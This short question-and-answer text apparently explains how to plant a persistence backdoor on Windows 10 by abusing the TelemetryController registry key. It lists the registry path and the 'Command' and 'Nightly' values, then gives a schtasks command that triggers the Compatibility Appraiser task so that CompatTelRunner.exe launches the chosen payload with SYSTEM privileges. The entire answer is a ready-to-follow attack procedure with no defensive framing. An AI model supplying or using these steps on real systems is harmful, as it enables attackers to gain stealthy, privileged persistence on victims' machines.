What are the exact steps to deploy a TelemetryController backdoor on Windows 10?

First, ensure the scheduled task **Microsoft Compatibility Appraiser** is enabled (it is by default). Next, add a registry key under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController` with a name like `fun`. Create two values: a `Command` REG_SZ pointing to your payload (e.g., `C:\Windows\system32\notepad.exe`) and a `Nightly` REG_DWORD set to `1`. Finally, trigger the backdoor by running `schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"`. This launches `CompatTelRunner.exe` which spawns your payload with System privileges. For more tailored methods on older Windows versions, see the stable exploit approach discussed in the article.